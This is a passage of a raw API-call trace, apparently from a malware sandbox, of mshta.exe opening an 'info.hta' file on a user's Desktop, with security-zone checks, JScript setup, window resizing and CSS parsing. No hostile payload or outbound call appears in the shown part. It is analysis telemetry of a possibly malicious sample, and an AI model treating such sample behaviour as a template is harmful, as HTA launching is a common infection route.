(HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x4be310 [0227.335] GetCurrentThreadId () returned 0x390 [0227.335] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be310 | out: hHeap=0x470000) returned 1 [0227.335] GetCurrentThreadId () returned 0x390 [0227.335] GetCurrentThreadId () returned 0x390 [0227.335] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f6bc | out: ppu=0x41f6bc) returned 0x0 [0227.335] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.335] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f65c, dwFlags=0x0 | out: pdwZone=0x41f65c*=0xffffffff) returned 0x800c0011 [0227.335] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.335] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.335] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.335] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x1400, pPolicy=0x41f660, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x41f660*=0x0) returned 0x0 [0227.335] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.336] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.336] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f64c | out: ppu=0x41f64c) returned 0x0 [0227.336] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.336] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f5ec, dwFlags=0x0 | out: pdwZone=0x41f5ec*=0xffffffff) returned 0x800c0011 [0227.336] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.336] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.336] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.336] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x1400, pPolicy=0x41f5f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x41f5f0*=0x0) returned 0x0 [0227.336] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.336] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.336] CoCreateInstance (rclsid=0x41f63c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740995b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x41f5f8) [0227.673] malloc (_Size=0x80) returned 0x72da18 [0227.673] GetVersion () returned 0x1db10106 [0227.673] __dllonexit () returned 0x73d77ecf [0227.673] __dllonexit () returned 0x73d77e9b [0227.673] __dllonexit () returned 0x73d77eb5 [0227.674] __dllonexit () returned 0x73d77f70 [0227.674] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x763d0000 [0227.674] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.675] EtwRegisterTraceGuidsA () returned 0x0 [0227.676] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.676] EtwRegisterTraceGuidsA () returned 0x0 [0227.676] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41dfb4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0227.676] GetProcAddress (hModule=0x763d0000, lpProcName="RegOpenKeyExA") returned 0x763e4907 [0227.676] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x41e0d8 | out: phkResult=0x41e0d8*=0x0) returned 0x2 [0227.680] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.680] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f50c, dwFlags=0x0 | out: pdwZone=0x41f50c*=0xffffffff) returned 0x800c0011 [0227.680] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.680] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.680] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.680] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x1401, pPolicy=0x41f510, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x41f510*=0x0) returned 0x0 [0227.680] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.680] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.680] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x54) returned 0x4bcdf0 [0227.680] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e0908 [0227.680] GetCurrentThreadId () returned 0x390 [0227.681] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x41f3d8, nSize=0x27 | out: lpBuffer="") returned 0x0 [0227.681] GetCurrentThreadId () returned 0x390 [0227.681] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0227.681] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x41f448, cchData=6 | out: lpLCData="1252") returned 5 [0227.681] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.681] GetCurrentThreadId () returned 0x390 [0227.681] GetCurrentThreadId () returned 0x390 [0227.681] CoCreateInstance (in: rclsid=0x73d615ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d615fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b306b4 | out: ppv=0x2b306b4*=0x4bef58) returned 0x0 [0227.681] IUnknown:AddRef (This=0x4bef58) returned 0x2 [0227.681] GetCurrentProcessId () returned 0x380 [0227.681] GetCurrentThreadId () returned 0x390 [0227.681] GetTickCount () returned 0x20cbc [0227.681] ISystemDebugEventFire:BeginSession (This=0x4bef58, guidSourceID=0x73d616d4, strSessionName="JScript:00000896:00000912:18134332") returned 0x0 [0227.681] GetCurrentThreadId () returned 0x390 [0227.681] GetCurrentThreadId () returned 0x390 [0227.682] ??2@YAPAXI@Z () returned 0x2b30b08 [0227.682] GetCurrentThreadId () returned 0x390 [0227.682] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0227.682] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4e3280 [0227.682] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f3a4 | out: ppv=0x41f3a4*=0x4968b8) returned 0x0 [0227.682] ??2@YAPAXI@Z () returned 0x2b30b40 [0227.682] CGIPTable::RegisterInterfaceInGlobal () returned 0x0 [0227.682] IUnknown:AddRef (This=0x4968b8) returned 0x2 [0227.682] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.682] ??2@YAPAXI@Z () returned 0x2b30b68 [0227.682] GetTickCount () returned 0x20cbc [0227.682] ??2@YAPAXI@Z () returned 0x2b311b8 [0227.682] malloc (_Size=0x40) returned 0x2b31228 [0227.682] malloc (_Size=0x104) returned 0x2b31270 [0227.682] ??2@YAPAXI@Z () returned 0x2b31380 [0227.682] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f3c0 | out: ppv=0x41f3c0*=0x4968b8) returned 0x0 [0227.682] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.683] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f3c0 | out: ppv=0x41f3c0*=0x4968b8) returned 0x0 [0227.683] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.683] StrCmpIW (psz1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", psz2="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0 [0227.683] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4e0938 [0227.683] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4e7918 [0227.683] GetCurrentThreadId () returned 0x390 [0227.683] realloc (_Block=0x0, _Size=0xc8) returned 0x2b313a0 [0227.683] _wcsicmp (_String1="", _String2="") returned 0 [0227.683] SysStringLen (param_1="\r\n window.moveTo(50, 50);\r\n window.resizeTo(screen.width - 100, screen.height - 100);\r\n ") returned 0x65 [0227.684] free (_Block=0x2b31498) [0227.684] ??3@YAXPAX@Z () returned 0x1 [0227.684] free (_Block=0x7213d0) [0227.684] free (_Block=0x2b31ca8) [0227.684] free (_Block=0x2b32130) [0227.684] free (_Block=0x2b31f20) [0227.684] free (_Block=0x2b31e10) [0227.684] ??2@YAPAXI@Z () returned 0x2b327c0 [0227.684] ??2@YAPAXI@Z () returned 0x2b327f8 [0227.684] malloc (_Size=0xc) returned 0x7213d0 [0227.684] ??2@YAPAXI@Z () returned 0x2b32818 [0227.684] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f4e0 | out: ppv=0x41f4e0*=0x4968b8) returned 0x0 [0227.684] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.685] ??2@YAPAXI@Z () returned 0x2b32860 [0227.685] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f530 | out: ppv=0x41f530*=0x4968b8) returned 0x0 [0227.685] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.685] ??2@YAPAXI@Z () returned 0x2b328d0 [0227.685] ISystemDebugEventFire:IsActive (This=0x4bef58) returned 0x1 [0227.685] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41f52c | out: ppv=0x41f52c*=0x4968b8) returned 0x0 [0227.685] IUnknown:Release (This=0x4968b8) returned 0x1 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.686] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.687] GetUpdateRgn (hWnd=0x30198, hRgn=0x704070e, bErase=0) returned 1 [0227.687] DeleteObject (ho=0x704070e) returned 1 [0227.687] SetWindowPos (hWnd=0x30198, hWndInsertAfter=0x0, X=0, Y=0, cx=1324, cy=762, uFlags=0x14) returned 1 [0227.687] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0227.687] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x46, wParam=0x0, lParam=0x41e8cc*=197016, plResult=0x41e768 | out: plResult=0x41e768) returned 0x1 [0227.687] NtdllDefWindowProc_W () returned 0x0 [0227.687] GetCurrentThreadId () returned 0x390 [0227.687] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0227.687] GetCurrentThreadId () returned 0x390 [0227.687] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0227.688] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x47, wParam=0x0, lParam=0x41e8cc*=197016, plResult=0x41e764 | out: plResult=0x41e764) returned 0x1 [0227.688] NtdllDefWindowProc_W () returned 0x0 [0227.688] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0227.688] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x5, wParam=0x0, lParam=0x2fa052c, plResult=0x41e3a0 | out: plResult=0x41e3a0) returned 0x1 [0227.688] NtdllDefWindowProc_W () returned 0x0 [0227.688] GetCurrentThreadId () returned 0x390 [0227.688] GetCurrentThreadId () returned 0x390 [0227.688] GetCurrentThreadId () returned 0x390 [0227.688] NtdllDefWindowProc_W () returned 0x0 [0227.689] ISystemDebugEventFire:IsActive (This=0x4bef58) returned 0x1 [0227.689] ??3@YAXPAX@Z () returned 0x1 [0227.689] free (_Block=0x2b313a0) [0227.689] GetCurrentThreadId () returned 0x390 [0227.689] GetCurrentThreadId () returned 0x390 [0227.689] GetCurrentThreadId () returned 0x390 [0227.692] StrCmpICW (pszStr1="text/css", pszStr2="text/css") returned 0 [0227.692] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41b4c0 | out: ppu=0x41b4c0) returned 0x0 [0227.692] CoInternetCombineUrl (in: pwzBaseUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pwzRelativeUrl="", dwCombineFlags=0x6000000, pszResult=0x41d5f0, cchResult=0x1000, pcchResult=0x41b53c, dwReserved=0x0 | out: pszResult="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/", pcchResult=0x41b53c) returned 0x0 [0227.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x62) returned 0x4c2d58 [0227.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf8) returned 0x4ab190 [0227.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8b4) returned 0x4d6668 [0227.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad30 [0227.692] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad48 [0227.693] IsCharSpaceW (wch=0xd) returned 1 [0227.693] IsCharSpaceW (wch=0xa) returned 1 [0227.693] IsCharSpaceW (wch=0xd) returned 1 [0227.693] IsCharSpaceW (wch=0xa) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x62) returned 0 [0227.693] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x7b) returned 0 [0227.693] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4e3760 [0227.693] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.693] IsCharSpaceW (wch=0xd) returned 1 [0227.693] IsCharSpaceW (wch=0xa) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x66) returned 0 [0227.693] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.693] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.693] IsCharSpaceW (wch=0x3a) returned 0 [0227.693] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e7968 [0227.693] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x31) returned 0 [0227.693] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.693] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x54) returned 0 [0227.693] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.693] IsCharSpaceW (wch=0x2c) returned 0 [0227.693] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.693] IsCharSpaceW (wch=0x20) returned 1 [0227.693] IsCharSpaceW (wch=0x73) returned 0 [0227.694] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.694] IsCharSpaceW (wch=0x3b) returned 0 [0227.694] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.694] IsCharSpaceW (wch=0xd) returned 1 [0227.694] IsCharSpaceW (wch=0xa) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x6d) returned 0 [0227.694] IsCharSpaceW (wch=0x66) returned 0 [0227.694] IsCharSpaceW (wch=0x31) returned 0 [0227.694] bsearch (_Key=0x41f464, _Base=0x740a5220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x74084c66) returned 0x0 [0227.694] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x30) returned 0x4d5760 [0227.694] IsCharSpaceW (wch=0x31) returned 0 [0227.694] IsCharSpaceW (wch=0x31) returned 0 [0227.694] IsCharSpaceW (wch=0x35) returned 0 [0227.694] IsCharSpaceW (wch=0x70) returned 0 [0227.694] IsCharSpaceW (wch=0x78) returned 0 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x31) returned 0 [0227.694] IsCharSpaceW (wch=0x70) returned 0 [0227.694] IsCharSpaceW (wch=0x31) returned 0 [0227.694] IsCharSpaceW (wch=0x70) returned 0 [0227.694] IsCharSpaceW (wch=0x70) returned 0 [0227.694] IsCharSpaceW (wch=0x78) returned 0 [0227.694] IsCharSpaceW (wch=0x0) returned 0 [0227.694] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4e3780 [0227.694] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4bf810 [0227.694] IsCharSpaceW (wch=0x20) returned 1 [0227.694] IsCharSpaceW (wch=0x54) returned 0 [0227.694] IsCharSpaceW (wch=0x6e) returned 0 [0227.694] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x26) returned 0x4d6090 [0227.695] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4bf810, Size=0x60) returned 0x4bb1b8 [0227.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d5760 | out: hHeap=0x470000) returned 1 [0227.695] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.695] IsCharSpaceW (wch=0x3a) returned 0 [0227.695] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.695] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.695] IsCharSpaceW (wch=0x3b) returned 0 [0227.695] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.695] IsCharSpaceW (wch=0xd) returned 1 [0227.695] IsCharSpaceW (wch=0xa) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x20) returned 1 [0227.695] IsCharSpaceW (wch=0x6c) returned 0 [0227.695] IsCharSpaceW (wch=0x78) returned 0 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4aad60 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] IsCharSpaceW (wch=0x30) returned 0 [0227.695] IsCharSpaceW (wch=0x70) returned 0 [0227.695] IsCharSpaceW (wch=0x78) returned 0 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] IsCharSpaceW (wch=0x70) returned 0 [0227.695] IsCharSpaceW (wch=0x70) returned 0 [0227.695] IsCharSpaceW (wch=0x78) returned 0 [0227.695] IsCharSpaceW (wch=0x0) returned 0 [0227.695] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4bb1b8, Size=0x90) returned 0x4b7a20 [0227.695] IsCharSpaceW (wch=0x31) returned 0 [0227.695] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x78) returned 0 [0227.696] IsCharSpaceW (wch=0x0) returned 0 [0227.696] IsCharSpaceW (wch=0x31) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x78) returned 0 [0227.696] IsCharSpaceW (wch=0x0) returned 0 [0227.696] IsCharSpaceW (wch=0x31) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x78) returned 0 [0227.696] IsCharSpaceW (wch=0x0) returned 0 [0227.696] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b7a20, Size=0xd0) returned 0x4b7a20 [0227.696] IsCharSpaceW (wch=0x0) returned 0 [0227.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4aad60 | out: hHeap=0x470000) returned 1 [0227.696] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.696] IsCharSpaceW (wch=0x3a) returned 0 [0227.696] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x32) returned 0 [0227.696] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.696] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.696] IsCharSpaceW (wch=0x3b) returned 0 [0227.696] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.696] IsCharSpaceW (wch=0xd) returned 1 [0227.696] IsCharSpaceW (wch=0xa) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x20) returned 1 [0227.696] IsCharSpaceW (wch=0x62) returned 0 [0227.696] IsCharSpaceW (wch=0x78) returned 0 [0227.696] IsCharSpaceW (wch=0x32) returned 0 [0227.696] IsCharSpaceW (wch=0x32) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x70) returned 0 [0227.696] IsCharSpaceW (wch=0x78) returned 0 [0227.696] IsCharSpaceW (wch=0x0) returned 0 [0227.696] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.696] IsCharSpaceW (wch=0x3a) returned 0 [0227.697] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x23) returned 0 [0227.697] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.697] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.697] IsCharSpaceW (wch=0x3b) returned 0 [0227.697] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.697] IsCharSpaceW (wch=0xd) returned 1 [0227.697] IsCharSpaceW (wch=0xa) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x20) returned 1 [0227.697] IsCharSpaceW (wch=0x7d) returned 0 [0227.697] IsCharSpaceW (wch=0x44) returned 0 [0227.697] IsCharSpaceW (wch=0x23) returned 0 [0227.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad60 [0227.697] IsCharSpaceW (wch=0x23) returned 0 [0227.697] IsCharSpaceW (wch=0x23) returned 0 [0227.697] IsCharSpaceW (wch=0x45) returned 0 [0227.697] IsCharSpaceW (wch=0x44) returned 0 [0227.697] IsCharSpaceW (wch=0x45) returned 0 [0227.697] IsCharSpaceW (wch=0x44) returned 0 [0227.697] IsCharSpaceW (wch=0x45) returned 0 [0227.697] IsCharSpaceW (wch=0x44) returned 0 [0227.697] IsCharSpaceW (wch=0x23) returned 0 [0227.697] IsCharSpaceW (wch=0x30) returned 0 [0227.697] IsCharSpaceW (wch=0x25) returned 0 [0227.697] IsCharSpaceW (wch=0x25) returned 0 [0227.697] IsCharSpaceW (wch=0x0) returned 0 [0227.697] IsCharSpaceW 